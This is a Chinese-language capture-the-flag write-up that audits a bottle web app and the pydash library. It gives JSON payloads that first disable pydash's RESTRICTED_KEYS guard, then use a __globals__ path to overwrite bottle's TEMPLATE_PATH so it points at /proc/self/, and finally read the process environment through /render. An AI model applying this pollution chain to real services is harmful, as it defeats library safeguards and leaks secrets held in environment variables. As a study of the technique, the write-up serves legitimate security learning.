#ez_dash_revenge
考点是pydash的原型链污染,还有代码审计,要审计pydash和bottle的一些实现,根据这些来污染。
def setval(name:str, path:str, value:str)-> Optional[bool]:
if name.find("__")>=0: return False
for word in __forbidden_name__:
if name==word:
return False
for word in __forbidden_path__:
if path.find(word)>=0: return False
obj=globals()[name]
try:
pydash.set_(obj,path,value)
except:
return False
return True
@bottle.post('/setValue')
def set_value():
name = bottle.request.query.get('name')
path=bottle.request.json.get('path')
if not isinstance(path,str):
return "no"
if len(name)>6 or len(path)>32:
return "no"
value=bottle.request.json.get('value')
return "yes" if setval(name, path, value) else "no"
@bottle.get('/render')
def render_template():
path=bottle.request.query.get('path')
if len(path)>10:
return "hacker"
blacklist=["{","}",".","%","<",">","_"]
for c in path:
if c in blacklist:
return "hacker"
return bottle.template(path)
可以利用pydash的set_函数来进行原型链污染,选定对象(name),构造链路(path),然后指定污染为其他对象(value)。然后就要考虑一下怎么污染了。name中把bottle过滤了,并且有变量名长度限制,但是通过__globals__来间接拿到bottle,globals可以用各种长度不超过限制对的对象得到,刚好没有过滤它。所以可以有以下payload:
// name=setval
{
"path": "__globals__.bottle.TEMPLATE_PATH",
"value": "['../../../../../proc/self/']"
}
// 调试可以发现bottle存在TEMPLATE_PATH,默认为./与./views/,这里通过污染它来使得我们直接获取环境变量文件。
但是传入这句时仍会报no,查一下,字符长度也没有问题,那问题可能就出在pydash.set_这个函数的执行上了。一路追踪这个函数的实现,可以发现如下代码:
(source.py)set_ -> (objects.py)set_with() -> (objects.py)update_with() -> (helpers.py)base_set() -> (helpers.py)_raise_if_restricted_key() -> (helpers.py)seattr()
到setattr才是真的污染完成。
def _raise_if_restricted_key(key):
# Prevent access to restricted keys for security reasons.
if key in RESTRICTED_KEYS:
raise KeyError(f"access to restricted key {key!r} is not allowed")
# RESTRICTED_KEYS = ("__globals__", "__builtins__")
def base_set(obj, key, value, allow_override=True):
"""
Set an object's `key` to `value`. If `obj` is a ``list`` and the `key` is the next available
index position, append to list; otherwise, pad the list of ``None`` and then append to the list.
Args:
obj: Object to assign value to.
key: Key or index to assign to.
value: Value to assign.
allow_override: Whether to allow overriding a previously set key.
"""
if isinstance(obj, dict):
if allow_override or key not in obj:
obj[key] = value
elif isinstance(obj, list):
key = int(key)
if key < len(obj):
if allow_override:
obj[key] = value
else:
if key > len(obj):
# Pad list object with None values up to the index key, so we can append the value
# into the key index.
obj[:] = (obj + [None] * key)[:key]
obj.append(value)
elif (allow_override or not hasattr(obj, key)) and obj is not None:
_raise_if_restricted_key(key)
setattr(obj, key, value)
return obj
也就是说__globals__被pydash本身给拦了,那我们就先把这个拆了:
// name=pydash
{
"path": "helpers.RESTRICTED_KEYS",
"value": []
}
可以看到成功拆除。这样就可以污染TEMPLATE_PATH了
接下来只要访问/render?path=environ就可以看到当前进程的环境变量了。